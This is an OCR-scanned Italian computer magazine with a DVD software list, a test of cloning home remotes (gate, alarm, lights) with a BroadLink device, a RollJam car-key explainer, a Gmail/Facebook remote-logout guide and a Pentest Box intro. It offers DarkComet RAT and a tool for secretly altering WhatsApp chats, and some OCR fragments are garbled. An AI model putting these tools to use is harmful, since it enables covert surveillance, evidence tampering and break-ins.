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numero di chi ti "telefona con l'anonimo". Ecco 
come fare 

Scarica a mille col cellulare.87 

Ti regaliamo l'app per gestire al meglio i download 
con lo smartphone Android, anche dalle reti Peer 
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tecniche 

Fai incetta di app a costo zero ... .96 
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GRANDE NOVITÀ 

Micette 

il marchio Bimby è di titolarità della società 

Vorwerk International AG che ne detiene tutti i diritti 

A pacai e uetoci ceti il tua A 

Bk Bimby ^ 



UN IMPERDIBILE LIBRO CON 

ili PAGINE DI RICETTE 

144 PASSO PASSO 




Un nuovo libro ricettario 
con i dolci più gustosi e sfiziosi 
da realizzare con il Bimby. 

E poi, i consigli pratici 
e le dritte della Scuola 
per diventare dei veri esperti. 


EDIZIONI 

MASTER 


Scoprilo IN EDICOLA 





(i) II software sul DVD-Rom 



INCLUDE 


DVD da 43 GB 


cFosSpeed ìo.os O 
Il programma che mette il 
turbo alla tua connessione 
Internet 


File: cfosspeed.zip 



Origin Client □ 

Gioca gratis e scarica i mi¬ 
gliori titoli del momento 


File: OriginThinSetup.zip 



Plex Media Server 0 912 

Trasforma il computer in un 



server multimediale DNLA 

File: Plex-Media-Server.zip 

Digital Secret TV O 

Il sistema unico per vedere 
tutti i canali Tv in chiaro 

File: Kodifull.zip 

NextPvr 

Vedere, gestire e registrare la 
TV da Internet 

File: NPVRSetup.zip 



FFdshow 

Migliora la qualità dei filmati 
compressi 

File: FFdshow.zip 



Flutter 0722 

Controlla il tuo PC senza 
mouse e tastiera 

File: Flutter.zip 


Simple Port 
Forwarding Q 

Aprire le porte del proprio 
router in pochi clic 

File: simple_port_forwarding_setup.zip 



DarkComet RAT 
Legacy O 

Controllo remoto del com¬ 
puter 

File: Dark Comet.zip 



Spybot - Search & 
Destroy 2.4 O 



PRODOTTI COMPLETI 



PENTEST BOXO 

Basta una Pendrive USB per "penetrare" nei computer 

Pentest Box è una piattaforma per il penetration test creata specificamente per i 
sistemi Windows. Pentest Box viene distribuita come un archivio RAR compres¬ 
so da 2,5 GB, non richiede installazione e può essere decompressa sia su di¬ 
sco, sia su una pendrive USB. È importante sapere che l'antivirus del nostro PC 
potrebbe segnalare la presenza di minacce dovute alle tracce di alcuni exploit. 
Possiamo scegliere di ignorare queste segnalazioni 0 anche di rimuovere i file, 
ma, nel secondo caso, alcuni test non saranno disponibili. 


■ S.O.: Windows XP/Vista/7/8/8.1 ■ File: PentestBox-1.2.rar 


WHATSHACK 

Così ti taroccano le chat Whatsapp 

Basta mettere le mani sullo smartphone per i pochi secondi sufficienti a co¬ 
piare sul proprio PC il database con tutti i messaggi archiviati, modificarne 
qualcuno, aggiornare l'archivio e rimettere tutto a posto. È doveroso precisa¬ 
re che è possibile effettuare tale modifica solo su dispositivi Android ai quali 
siano stati concessi i permessi di super user, il noto "root" per intenderci. La 
"magia" è resa possibile dal fatto che Whatsapp memorizza i messaggi in un 
DB non crittografato, in una directory del sistema operativo. Si tratta quindi di 
prelevare tale file, modificarlo e reinserirlo aH'interno dell'app sul dispositivo, 
cosicché le conversazioni risultino manipolate rispetto a quelle originale. 

■ S.O.: Windows XP/Vista/7/8/8.1/10 ■ File:WhatsHack.rar 



6 Win Magazine Speciali 














































































Il software sul DVD-Rom 0 


Pulizia completa da spyware 
e malware per il PC 

File: spybotzip 



Adobe Acrobat 
ReaderDC Q 

Gestione completa dei PDF 
con supporto cloud 

File: AcroRdrDC1500720033_itJT.zip 



Adobe Flash Player is O 

Visualizza correttamente le 
pagine Web 

File: instalLflashplayer18.ZIP 



Adobe Shockwave 
Player m O 

Player multimediale per i 
contenuti Web 

File: ShockwaveJnstaller_Full.zip 



TOR Browser 503 O 

Naviga e scarica da Internet 
senza lasciare tracce 

File: torbrowser-install-5.0.3_it.zip 



K-Lite Codec Pack 
Mega n .40 O 
Tutti i codec per riprodurre 
sul PC musica e video 
File: K-Lite_Codec_Pack_1140_Mega.zip 

VLC Media Player 221 O 

Il player multimediale nume¬ 
ro uno si aggiorna! 

File: vlc-2.2.1-win.ZIP 


uTorrent 345 O 

Sfrutta la rete Torrent per 
scaricare sempre al massimo 
File: uTorrent.zip 



CCleaner 5105373 Q 

Ripulisci a fondo il computer 
da file inutili e obsoleti 

File: ccsetup.zip 



7 -Zip 9.20 O 

Creazione e gestione veloce 
di archivi compressi 

File: 7zip.zip 



Daemon Tools 
Lite 10.1.0 i I 

Testa i tuoi CD e DVD e ma¬ 
sterizzali in sicurezza 

File: DTLitelnstaller.zip 



■ 






| . WOKtoVrtKi » 



1 * IqMiOH. 



IVB. 



TV Dream Player 0772 □ 

TV gratis e legale su PC, 
smartphone e tablet 

File: TVdream-Setup.zip 



Avira Antivirus 
Freeware 2015 D 

Sicurezza totale dai pericoli 
di Internet... anche su mobile 
File: avirajree_antivirusjt.zip 

lunkware 

Removai Tool 7.6.3 ESI 

Piazza pulita delle toolbar 
indesiderate dal browser 

File: JRT.zip 


Notepad++ 683 Q 

Editor di testo avanzato per 
il Web 

xxxxxxxxx 



O&O ShutUp 10 

50 impostazioni per migliora¬ 
re la privacy su Windows 10 
File: 00SU.zip 



Spybot Anti-Beacon 

Bloccare la condivisione di 
informazioni personali 

File: SpybotAntiBeacon.zip 






<$> DETEKT 


WARMINO! 


wtut k thk? 

ttw « » srrfit toc» tTv* tn« to rtenrfy perennai spyware rtecnorn on yoor computf» wrvn 
nmv-nrrt, * wt ey to >50* tv certwi Mrators n nyfrwyy if yr*j rvw any «Divino 

prftarmsnct and òfrrposr chancw c* ft*sr posrvrs The mrvitm w4 tate «w muu\ » 


ASHAMPOO MUSIC STUDIO so 

Trasforma il PC in una sala di registrazione 

Ashampoo Music Studio 5 è una suite per l'editing 
musicale, che include decine di strumenti professio¬ 
nali. Permette, ad esempio, di creare la nostra per¬ 
sonalissima compilation sonora estraendo l'audio 
da un DVD video. Grazie alla semplice aH'interfaccia 
possiamo editare i brani audio, tagliarli e organizzarli 
in tracce separate. Non finisce qui: si possono anche 
realizzare mixaggi di più brani, masterizzare CD au¬ 
dio e registrare l'audio quando si canta 0 mente si 
suona uno strumento musicale. 



DETEKT 

Per scovare spyware e trojan governativi 

Detekt è un nuovo potente scanner antivirale che 
si occupa di scovare i trojan governativi e altri pro¬ 
grammi di spionaggio intrufolati nel PC. Oltre a 
Regin,infatti, altri trojan escogitati dai governi, posso¬ 
no tenere sotto controllo: PC di altri utenti, fotocame¬ 
ra e microfono, nonché vigilare su servizi di chat 0 
immissioni di dati. Il software gratuito Detekt è per 
lo meno in grado di rintracciare e segnalare questi 
programmi di spionaggio. Questa suite è consigliata 
da organismi come Amnesty International. 

■ S.O.: Windows XP/Vista/7/8/8.1 ■ File: detekt.zip 


■ S.O.: Win XP/Vista/7/8/8.1 

■ File:ashampoo_music_studio_5_19220 



ACE STREAM MEDIA 3.00 

Guarda gratis e in HD la TV in streaming HD 

Ecco un lettore multimediale basato su VLC e com¬ 
patibile con il protocollo BitTorrent (P2P) per vedere 
TV in streaming 0 live broadcast in HD. Grazie ad 
Ace Stream Media i pirati riescono a guardare i film 
.torrent direttamente in streaming, senza scaricarli 
sul PC. In altre parole, utilizzando Ace Stream media 
aggiungono alle potenzialità di VLC la funzione di 
riproduzione online di audio e video distribuiti sulla 
rete BitTorrent. Questo potente player alle funzioni 
di streaming aggiunge le stesse funzioni di VLC. 

■ S.O.: Windows XP/Vista/7/8/8.1 ■ File: Ace_Stream_Media.zip 
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O Così fa Thacker 


Fai da te | Il telecomando magico dell'hacker 


Il telecomando 
dell’hacker 

È senza tasti, è Wi-Fi e sblocca antifurti, scardina porte, 
cancelli e manda in tilt luci e condizionatori di casa! 


Cosa oi 
occorre FACLE 

CONTROLLER WI-FI 

BROADLINK 
RM PRO 

Quanto costa: € 35,00 

Sito Internet: 

www.banggood.com 



L o scorso mese di luglio, il giornalista 
americano Andy Greenberg è stato il 
protagonista (o forse sarebbe meglio 
dire la cavia) di un esperimento condotto da 
Charlie Miller e Chris Vaiasele, due hacker 
specializzati in sicurezza automobilistica 
che sono riusciti a prendere il controllo a 
qualche chilometro di distanza, via Inter¬ 
net, della Jeep Cherokee guidata da Green¬ 
berg, mandandola fuori strada! Il clamore 
fu grande, tanto da costringere il gruppo 
automobilistico FCA ad un richiamo di alcuni 
modelli venduti negli Stati Uniti. L'esperi¬ 
mento, condotto ovviamente in condizioni 
di assoluta sicurezza e soltanto dopo aver 
informato la stessa Casa automobilistica, 


servì ad accendere i riflettori sull'estrema 
vulnerabilità dei sistemi elettronici di bordo 
che vengono montati sulle nostre automobili. 

Mi hanno aperto l’auto 
con il cellulare! 

La Jeep Cherokee, infatti, non è l'unica au¬ 
tovettura "attaccabile” da remoto. Durante 
l'ultima Def Con Hacking tenutasi a Las Ve¬ 
gas lo scorso agosto (www.defcon.org), ad 
esempio, l'attenzione della comunità hacker 
e dei tanti appassionati è stata attirata da 
uno strano aggeggio capace di hackerare le 
centraline delle autovetture consentendo 
l'apertura delle portiere senza l'utilizzo del 


telecomando di fabbrica, ma sfruttando un 
semplice collegamento col cellulare. Il Roll 
Jam, questo il suo nome, è un piccolo di¬ 
spositivo elettronico realizzabile con una 
spesa di circa 30 euro e con un minimo di 
competenza elettronica, capace di interagire 
con le centraline di molti modelli di auto¬ 
mobili sfruttando un bug che i costruttori 
conoscevano già da tempo (leggi il box II 
Rolljam che apre la nostra auto). A darne la 
dimostrazione pratica davanti a decine di 
persone è stato Samy Kamkar, il ricercatore 
che lo ha realizzato e che era già salito agli 
onori della cronaca per essere riuscito ad 
hackerare il sistema di infotainment OnStar 
montato su molti modelli di Opel. 


IL ROLLJAM CHE APRE LA NOSTRA AUTO 


Ecco il RollJam con cui il ricerca¬ 
tore Samy Kamkar è riuscito ad 
aprire i finestrini e le portiere di 
alcune automobili. Il dispositivo è 
in realtà un jammer (disturbatore 
di frequenze) composto da tre 
moduli radio: due di questi in¬ 
tercettano il segnale proveniente 
dal telecomando dell'auto della 
vittima per evitare che arrivi alla 
centralina di bordo. Il terzo, inve¬ 
ce, non solo intercetta il segnale, 
ma registra anche le informazioni 
inviate. In uno scenario reale, il 
proprietario dell'auto prova ad 
aprire o chiudere le portiere sen¬ 
za riuscirci (in quanto il segnale 
viene intercettato dal Rolljam) e 


■ Il RollJam è costruito usando 
semplici componenti elettronici 
facilmente reperibili su Internet 
o nei negozi specializzati, per 
un costo complessivo di circa 35 
euro. Ulteriori informazioni le 
troviamo sul sito http://samy.pl. 



quindi riprova. Al secondo ten¬ 
tativo, il segnale viene di nuo¬ 
vo intercettato ma il jammer a 
questo punto invia alla centra¬ 
lina dell'auto il primo segnale 


lasciando credere al proprietario 
dell'auto che tutto abbia funzio¬ 
nato correttamente. A questo 
punto il malintenzionato riuscirà 
ad aprire le portiere dell'automo¬ 
bile utilizzando il secondo codice 
inviato dal telecomando. 


Configuriamo 

L’installazione del BroadLink RM PRO non 
Fatto questo, dovremo creare un account 



^ Alimentiamo il telecomando 

Colleghiamo al BroadLink il cavo USB 
fornito in dotazione nella confezione del 
dispositivo. Recuperiamo poi un adattatore di 
corrente da 5 volt e 1 Ampere con presa italia¬ 
na (quello fornito dal produttore, infatti, è di tipo 
inglese). Colleghiamo il tutto alla rete elettrica. 
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ECCO LO SCHEMA DI FUNZIONAMENTO DEL BROADLINK RM PRO 


Innanzitutto è necessario installare sullo 
smartphone Android o iOS l'app e-Control che 
permette di interfacciarsi con il dispositivo. 
Successivamente, colleghiamo il BroadLink 
ad una presa elettrica o ad un dispositivo con 
ingresso USB (notebook o PC, ad esempio). È 
quindi necessario creare un account sul sito 


della BroadLink: così facendo, verrà creata una 
rete privata VPN (Virtual Private Network) tra il 
nostro account e il controller per poterlo gestire 
in sicurezza anche da remoto. Il dispositivo 
può ora essere connesso al router Wi-Fi di casa 
e impostato in modalità programmazione per 
poter intercettare e clonare il segnale dei vari 


telecomandi. Ovviamente, se decidiamo di 
controllare il dispositivo da remoto è necessario 
che il router Wi-Fi a cui è connesso sia a sua volta 
collegato alla linea ADSL. Se invece vogliamo 
usare il BroadLink solo all'interno delle mura 
domestiche, possiamo anche scollegare il cavo 
di rete e lasciare aperto il Wi-Fi. 



il dispositivo di controllo remoto 

richiede particolari accortezze: è sufficiente collegarlo alla rete elettrica; accenderlo e seguire la procedura sotto indicata, 
gratuito per poter utilizzare il telecomando magico anche quando non siamo in casa. 



^ Ecco l’app di controllo 

Dallo smartphone scarichiamo l’applica¬ 
zione e-Control (disponibile per Android 
e iOS). Attiviamo il Wi-Fi di casa, connettiamo il 
telefono e awiamo l’app. In automatico verranno 
rilevati il dispositivo e la rete. Nella nuova scher¬ 
mata digitiamo la password di accesso al Wi-Fi. 


^ Attiviamo tutte le funzioni 

Dalla schermata iniziale entriamo nel 
menu (tasto in alto a sinistra) e cucchia¬ 
mo Login formore functions. Inseriamo un indi¬ 
rizzo e-mail, una password, uno username e tap¬ 
piamo Sign in. Grazie alla registrazione saremo in 
gradi di controllare i dispositivi anche da remoto. 


Il telecomando è pronto 

4 Tappiamo adesso sul pulsante Configure 
per connettere il BroadLink alla rete Wi-Fi 
domestica. A questo punto siamo pronti per iniziare 
ad utilizzare il nostro magico dispositivo. Per scopri¬ 
re come, non dobbiamo fare altro che continuare a 
leggere i tutorial delle prossime pagine. 
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La realtà supera la fantasia 

In termini pratici, il Rolljam è in grado di 
intercettare i codici di blocco/sblocco che 
il telecomando originale trasmette all'auto. 
Tale segnale viene quindi inviato alla centra¬ 
lina effettuando una serie di interrogazioni, 
al termine delle quali si riesce ad aprire l'au¬ 


tovettura (altrui) utilizzando un semplice 
smartphone. Per fortuna, verrebbe da dire, 
che un tale dispositivo è al momento cata¬ 
logabile come un semplice esperimento da 
laboratorio: se fosse così semplice controllare 
e pilotare da remoto qualsiasi automobile ci 
sarebbe davvero di che preoccuparsi! E se 


invece scoprissimo che allo stesso prezzo 
è già in commercio un dispositivo simile 
al Rolllam, già configurato e predisposto 
per la cattura di codici? Come nei migliori 
racconti horror, gli incubi prendono forma: 
il telecomando magico dell'hacker si chiama 
BroadLink RM PRO e viene dalla Cina. Si trat- 


Posizioniamo il teleco¬ 
mando di fronte al Broa¬ 
dLink e premiamo Power 
per clonare il segnale di 
accensione/spegnimen¬ 
to. Ovviamente l’interrut¬ 
tore delle luci deve avere 
un controller RF o IrDA. 
Ripetiamo la procedura 
per clonare le funzioni 
anche degli altri tasti. 



LUCI DI CASA 




CONDIZIONATORE 

_ 


C ^ 

w 


Tappiamo sull’icona 
+ che troviamo in alto 
a destra nell’interfac¬ 
cia principale dell’ap¬ 
plicazione e-Control e 
scegliamo la voce Add 
remote dal menu con¬ 
testuale che appare. 
Tappiamo cloudaircon 
e impostiamo il tasto 
Power. 


Posizioniamo il teleco¬ 
mando di fronte al Bro¬ 
adLink e premiamo 
Power. Lasciamo il Bro¬ 
adLink nelle vicinanze del 
condizionatore (un paio di 
metri) e diamo il coman¬ 
do di accensione/spegni¬ 
mento. Ovviamente pro¬ 
cediamo a configurare 
anche gli altri tasti. 
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Tappiamo sul + in alto 
a destra nell'Interfaccia 
dell’app e-Control e sce¬ 
gliamo Add remote. Tap¬ 
piamo TV e impostiamo 
le funzionalità On e Off 
e quelle per il cambio 
canale. Di solito i teleco¬ 
mandi TV sono infrarossi 
e il BroadLink deve esse- 



Posizioniamo il tele¬ 
comando del televi¬ 
sore di fronte al Bro- 
adLink e premiamo il 
tasto Power per clona¬ 
re il segnale di accen¬ 
sione/spegnimento del 
dispositivo. Ripetiamo 
la stessa procedura per 
clonare i tasti che rego¬ 
lano il volume. 



TELEVISORE 



Lo abbiamo 
utilizzato con: 

per motivi disicurezza 
non indichiamo 
il modello di cancello 


CANCELLO ELETTRONICO 


■ 




Tappiamo sul + in alto 
a destra nell’interfac¬ 
cia principale dell'app 
e-Control e scegliamo 
Add remote dal menu. 
Tappiamo su Userdefi- 
ned A. Posizioniamo il 
telecomando di fronte 
al BroadLink e premia 
mo il tasto Power per 
clonarne il segnale. 


smart plug 


2 remian ; 00:02 open 


Indirizziamo il tasto di 
apertura del cancel¬ 
lo verso il BrodaLink e 
memorizziamo il segna¬ 
le. Avviciniamoci ades¬ 
so al sensore del can¬ 
cello e tappiamo Power 
in e-Control. Ovviamen¬ 
te, se il telecomando ha 
anche altri tasti, cloniamo 
anche questi. 


ta di un piccolo strumento dotato di una serie di 
sensori posti su tutti i lati (in modo da avere un 
raggio di azione a 360 gradi) che, combinato con 
lo smartphone, riesce a clonare il segnale dei vari 
tipi di telecomandi e controllare dispositivi che 
utilizzano segnali a infrarossi (IrDA) e radio fre¬ 


quenze (RF) come TV, decoder, condizionatori 
e cancelli (il dispositivo non è compatibile con i 
telecomandi di tipo rolling code che generano 
un codice operativo diverso ad ogni impulso). 
Se utilizzato correttamente, il BroadLink può 
diventare il vero centro di controllo della no¬ 


stra casa domotica. Ma se dovesse finire nelle 
mani sbagliate, aprirebbe scenari terrificanti! 
Ecco perché abbiamo deciso di testarlo a fondo 
provando a clonare tutti i telecomandi di casa: il 
risultato lo trovate in queste pagine. Anticipia¬ 
mo soltanto che ha funzionato perfettamente! ^ 
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Lo abbiamo 
utilizzato con: 

f Per motivi di sicurezza non * 
indichiamo il modello di antifur¬ 
to usato. Diciamo solo che si trat¬ 
ta di un dispositivo dotato di SIM 
per il controllo da remoto 


£7> 


Tappiamo sul + in alto 
a destra nell'Interfac¬ 
cia principale dell'app 
e-Control e sceglia¬ 
mo Add remote dal 
menu che verrà aper¬ 
to. Il dispositivo funzio¬ 
na anche su antifurti di 
casa. Basta tappare su 
TC1 e memorizzare la 
frequenza di On e Off. 


(2> vD 


^ U 

7) i) fs p 


Posizioniamo il tele¬ 
comando dell’antifur¬ 
to di casa di fronte al 
BroadLink e premia¬ 
mo il tasto Power per 
clonare il segnale di 
accensione/spegni¬ 
mento. Ripetiamo la 
procedura per clonare 
anche gli altri tasti del 
dispositivo. 


^ r* 




ANTIFURTO 


Volendo riprodurre il funzionamento del dispositivo RollJam di 
cui parlavamo all’Inizio dell’articolo, abbiamo condotto alcuni 
test su diversi modelli di automobile, sia recenti sia di qualche 
anno fa. In alcuni casi, il BroadLink è riuscito ad intercetta¬ 
re il segnale del telecomando, ma senza riuscire poi a ripro¬ 
durlo. Altre volte, invece, il segnale non veniva in alcun modo 
memorizzato. L’esperimento, dunque, si può considerare non 
riuscito. La spiegazione è che i telecomandi delle automobi¬ 
li sono di tipo rolling code che generano codici di controllo 
che cambiano ad ogni utilizzo e “scadono” se non utilizzati 
a breve. La delusione nel non essere riusciti ad hackerare la 
nostra automobile è stata tanta, ma almeno abbiamo avuto 
la conferma che dispositivi come il RollJam sono per adesso 
utilizzabili solo a livello sperimentale: potremo quindi conti¬ 
nuare a guidare la nostra vettura in tutta serenità al riparo da 
possibili attacchi informatici! 


o 


Lo abbiamo 
utilizzato con: 

diversi modelli 
di automobile di varie 
case automobilistiche 


V AUTOMOBILE 
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Una risposta a tutto 


Così fa l'hacker C* 


Il logout lo faccio da remoto! 

V Posso disconnettermi da Gmail in caso in cui abbia 

lasciato aperta la sessione su un altro computer? 

•/ Esiste un modo per fare la stessa cosa su Facebook? 


SERVE A CHI... 

... utilizza postazioni condivise con 
altri utenti e vuole terminare 
eventuali sessioni lasciate aperte 
su Gmail e Facebook 


D egli smartphone venduti nel mondo 
circa il 60% sono dispositivi Android. 
Come molti di noi sicuramente sanno, per 
poter utilizzare correttamente un telefonino 
dotato di questo OS è necessario disporre di 
un account Gmail da usare per sincronizzare 
tutti i dati sul cellulare. E-mail, contatti della 
rubrica e, nel caso di utilizzo di Google Drive, 
foto e documenti, saranno associati al nostro 
account e accessibili grazie ad esso. Proprio 
per questo Google ha pensato di implemen¬ 
tare un sistema di sicurezza che protegga al 
meglio i dati sensibili degli utenti. 

Accessi on-line in sicurezza 

Il colosso di Mountain View mette infatti a 


disposizione opzioni avanzate per il recu¬ 
pero dell'account e un sistema di verifica in 
due passaggi per l'accesso in modo tale da 
limitare al massimo la possibilità che venga 
violato. Quando si parla di dati sensibili biso¬ 
gna considerare anche i social network. Ogni 
giorno condividiamo foto, luoghi di nostro 
interesse e altro senza pensare che queste 
informazioni possano finire nelle mani di 
terzi in caso di violazione degli account. 
Facebook, al pari di Google, offre molte 
funzioni di protezione e sicurezza, come la 
possibilità di inserire il proprio cellulare per 
ripristinare l'accesso al profilo o, addirittura, 
utilizzare dei contatti preferiti dei quali ci 
fidiamo per recuperare le nostre credenziali 
in caso di accesso non autorizzato. 

Attenzione al logout 

Generalmente uno degli accorgimenti da 
seguire riguarda l'accesso all'account del 
social network da postazioni che non siano 
quelle di solito utilizzate o, ancor peggio, da 
postazioni condivise con altri utenti. Questo 


perché, nel caso in cui si ci dimenticassimo di 
effettuare il logout una volta utilizzati Gmail 
o Facebook, chiunque avrebbe la possibilità 
di entrare con le nostre credenziali e tutti i 
nostri accorgimenti di sicurezza sarebbero 
stati vani. Proprio per questo motivo preve¬ 
nire questi casi Gmail e Facebook offrono la 
possibilità di effettuare il logout da remoto, 
ovvero collegandoci da qualsiasi postazione 
e terminando le eventuali sessioni aperte 
lasciate su altri PC. Si tratta di pochi semplici 
passaggi che possono, però, salvaguardare 
i nostri account e la nostra privacy. 

TERMINIAMO QUALSIASI SESSIONE 
ATTIVA SU FACEBOOK 

Così come Gmail, anche Facebook offre la possibilità di 
eseguire il logout di tutte le sessione attive del nostro 
account da qualsiasi postazione. Per fare ciò accediamo a 
Facebook con il nostro account e andiamo su Impostazio- 
ni/Protezione, quindi facciamo clic sulla voce Dispositivi 
da cui hai effettuato l'accesso. Vedremo così comparire 
una lista contenente tutti gli accessi effettuati con il 
nostro account. Per effettuare il logout da remoto sarà 
sufficiente cliccare sulla voce Termina attività in corri¬ 
spondenza della sessione di nostro interesse. 


Vediamo come disconnetterci da remoto dal nostro account Gmail 





1 Colleghiamoci al sito Internet https://mail. 

google.com ed effettuiamo il login utilizzan¬ 
do le credenziali del nostro account Gmail. Dopo 
qualche secondo potremo visualizzare la classica 
schermata che ci mostra i messaggi di posta elet¬ 
tronica in arrivo. 


2 A questo punto dobbiamo scorrere la pagina 
fino in fondo. In basso a destra, sotto le ultime 
e-mail, troveremo la voce Dettagli. Facciamo 
clic su di essa per accedere alla schermata in 
cui è presente la funzione di Gmail che dobbia¬ 
mo utilizzare per eseguire il logout da remoto. 


3 Nella pagina Internet che si apre troveremo 
elencate tutte le attività recenti eseguite 
dal nostro account. Per effettuare il logout di 
tutte le sessioni attive non dobbiamo fare al¬ 
tro che cliccare sulla voce Esci da tutte le altre 
sessioni web. 
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O Così fa l'hacker 


Con lai nendrive 


entro mi tuo PC” 




Cosa ci f «J 
occorre 

TOOL DI HACKING 

PENTEST BOX 

✓DVD 


Sito Internet: 

https://pentestbox.com 


I6D 


Mi bastano 5 minuti per entrare 
nei tuoi sistemi sfruttando 
vulnerabilità e bug di Windows 


I n tutti i laboratori di sicurezza viene sem¬ 
pre raccontato, quasi come un mantra, 
un vecchio aneddoto secondo cui un PC 
è "sicuro" solo se è isolato dalla Rete, privo 
di periferiche di input e chiuso a chiave in 
una stanza. È chiaro che, con tutte queste 
restrizioni, un computer, oltre che "sicuro”, 
è anche del tutto inutile. Oggi non è facile 
trovare un PC che non acceda al Web e che 
non sia poco più di una macchina da scrivere, 
sicuramente infestato da virus, spyware e 
trojan, a causa dell’utilizzo di chiavette USB 
infette e di un antivirus non aggiornato. In 
aggiunta, bisogna anche considerare che 
le minacce di sicurezza non arrivano più 
solo dai personal computer: le persone che 
non hanno uno smartphone incollato alla 
mano si contano sulla punta delle dita e i 
primi elettrodomestici intelligenti iniziano 
a collegarsi a Internet. 

Internet delle cose 

Oggi la connessione è totale e le minacce di 
sicurezza arrivano da dispositivi diversi: se 
una volta per proteggerci bastava l’antivirus 
del computer, dobbiamo renderci conto che, 
adesso, è necessario stare più attenti. Il furto 
di identità sui social, password facili da indo¬ 
vinare, sistemi operativi non aggiornati, in¬ 
trusi sulla rete di casa o hacker che prendono 
il controllo di un elettrodomestico "smart", 
sono le nuove fonti di pericolo che rendono 
vulnerabile tutto il nostro ecosistema infor¬ 
matico. Gli esperti di sicurezza suggeriscono 
che, nei prossimi anni, le principali fonti 
di minacce informatiche saranno proprio 
gli elettrodomestici intelligenti, il cosiddet¬ 
to Internet delle Cose, che sono un ottimo 
punto di ingresso per i pirati informatici, a 
causa di firmware e software difficilmente 
aggiornabili. 


MUOVERSI 
NELLE DIRECTORY 

La prima cosa da fare per 
eseguire un penetration 
test con la nostra Box è 
prendere confidenza con 
il prompt dei comandi 
e imparare a muoversi 
nelle directory che ne 
raccolgono i tool. Il 
comando per cambiare 
directory è cd, seguito 
dal percorso completo 
della directory di desti¬ 
nazione. Supponendo 
chePentestBoxsia 
installata in C:\Penetra- 
tionTesting\PentestBox, 
dobbiamo digitare il co¬ 
mando cd PenetrationTe- 
sting\PentestBox\bin per 
portarci nella directory 
che organizza le varie 
categorie di strumenti 
della Box. Per risalire di 
una directory si utilizza il 
comando cd. Negli esem¬ 
pi, inoltre, utilizzeremo 
lavocepaf/iBoxper 
indicare il percorso dove 
è installata la Box. 
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L’anello debole 
dell’ecosistema informatico 

Come sempre non ci perdiamo d’animo e 
studiamo il problema della sicurezza osser¬ 
vandolo da tutti i suoi punti di vista, anche 
calandoci nei panni di un hacker, per capire 
meglio i trucchi e le tecniche di attacco dei 
pirati informatici. La risposta alle nuove 
minacce è una pratica nota come penetra- 
tion test che ci viene fornita dagli esperti di 
sicurezza, il settore deH’lnformatica che si 
occupa di difendere i nostri PC da minacce, 
attacchi e intrusioni. Un penetration tester 
è un professionista che offre i suoi servizi 
alle aziende e, usando gli strumenti degli 
hacker, cerca le debolezze per ottenere l'ac¬ 
cesso completo o parziale alle funzionalità o 
ai dati. Il penetration test segna un cambia¬ 


mento radicale negli obiettivi dell’esperto di 
sicurezza che passa da un atteggiamento di 
difesa dei sistemi, al loro attacco. 

Penetration test per tutti 

Pentest Box è una piattaforma per il penetra¬ 
tion test creata specificamente per i sistemi 
Windows che, da un lato, rende disponibile 
questa tecnica di sicurezza anche agli utenti 
non pratici di Linux; dall’altro, sfrutta l’ampio 
supporto alle periferiche offerto dal sistema 
di Redmond. Molti strumenti della Box si 
devono eseguire da linea di comando e ri¬ 
chiedono un po’ di confidenza con i comandi 
DOS o Linux per controllarli, ma, di volta 
in volta, nel descrivere i tool, spiegheremo 
quali sono i comandi necessari e la sintassi 
per invocarli. 


La sicurezza “offensiva” 

Pentest Box viene distribuita come un archi¬ 
vio RAR compresso da 2,5 GB, non richiede 
installazione e può essere decompressa sia 
su disco, sia su una pendrive USB. È impor¬ 
tante sapere che, durante la decompressione, 
l’antivirus del nostro PC potrebbe segnalare 
la presenza di possibili minacce dovute alle 
tracce di alcuni exploit e strumenti di attac¬ 
co. Possiamo scegliere di ignorare queste 
segnalazioni o anche di rimuovere i file, ma, 
nel secondo caso, alcuni test non saranno 
disponibili. La piattaforma occupa poco 
meno di 6 GB di spazio disco e l’ambiente 
per il penetration test può essere avviato 
lanciando l’eseguibile PentestBox.exe (o, 
se il nostro antivirus continua a rifiutarsi, e 
non vogliamo disabilitarlo, PentestBox.bat). 


I TOOL PER SCOVARE BUG ANCHE NEGLI SMARTPHONE ANDROID 



Apktool ricostruisce le risorse di un pacchetto di installazione Android. 


Gli smartphone stanno diventando i 
punti di accesso a molti servizi sensibili 
come quelli bancari e custodiscono 
tanti dati personali. Non c’è da mera¬ 
vigliarsi se Pentest Box offre una se¬ 
zione specifica per i sistemi Android. 
Infatti, questi smartphone possono 
installare software proveniente da 
fonti non attendibili e un’app ma¬ 
levola, visti i dati che conserviamo 
sullo smartphone, può essere una 
seria minaccia alla nostra sicurezza. 
Androguard (www.winmagazine.it/ 
link/3221) è una suite di programmi 
scritti in Python (che è un linguaggio 
di programmazione supportato dalla 
Box; si eseguono digitando python no- 
me_del_programma.py) specializzati 
per l’analisi dei programmi Android, in 
particolare dei file di installazione in 
formato APK. Per usare Androguard 
dobbiamo raggiungere la sua direc¬ 
tory di installazione con il comando 
cd C:\PenetrationTesting\PentestBox\ 
bin\androidsecurity\androguard o 
anche cdandroidsecurity\androguard, 


se siamo già nella directory bin della 
Pentest Box. 

IL GUARDIANO DELLE APP 

Androguard è dotato di un'interfaccia 
grafica e si avvia con il comando py¬ 
thon androgui.py, che guida la scelta 
del file con estensione .apk e la suc¬ 
cessiva visualizzazione del codice. Il 
tool consente anche di salvare una 
sessione di analisi e di ripristinarla 
in un secondo momento. La Pentest 
Box offre anche l'Android ADT (An¬ 
droid DeveloperToois, raggiungibile 
in bin\androidsecurity\adt partendo 
dalla directory principale della nostra 
installazione) con tanto di ambiente 
di sviluppo ed emulazione e l'editor 
Eclipse Juno per la scrittura delle app 
Android. Androwarn, invece, è un ana¬ 
lizzatore del codice delle applicazioni 
Android che, analizzando il pacchetto 
di installazione, rileva comportamenti 
sospetti e fraudolenti che coinvolgo¬ 
no i dati del cellulare, quelli personali 
gli accessi alla scheda di memoria, 


ai servizi dello smartphone, e tanti 
altri possibili pericoli. Per lanciare 
Androwarn, dobbiamo portarci nella 
sua directory con cd C:\Penetration- 
Testing\PentestBox\bin\androidse- 
curity\androwam. Nella directory di 
Androwarn è presente l'applicazione 
Android SampleApplication che pos¬ 
siamo utilizzare per fare qualche prova 
dianalisi (con il comando python an- 
drowarn.py SampleApplication\bin\ 
SampleApplication.apk -rhtml-v3) e 
generare un report in formato HTML. 

ATTIVITÀ SOTTO CONTROLLO 

Un pacchetto di installazione di 
un'applicazione Android (un file con 
estensione .apk) non è altro che un 
archivio compresso contenente tutte 
le risorse, le classi Java compilate ed 
il loro elenco (il file AndroidManifest. 
xml). Se decomprimiamo il pacchetto 
di installazione con un programma 
"classico", ne otteniamo però dei file 
illeggibili che non ci permettono di 
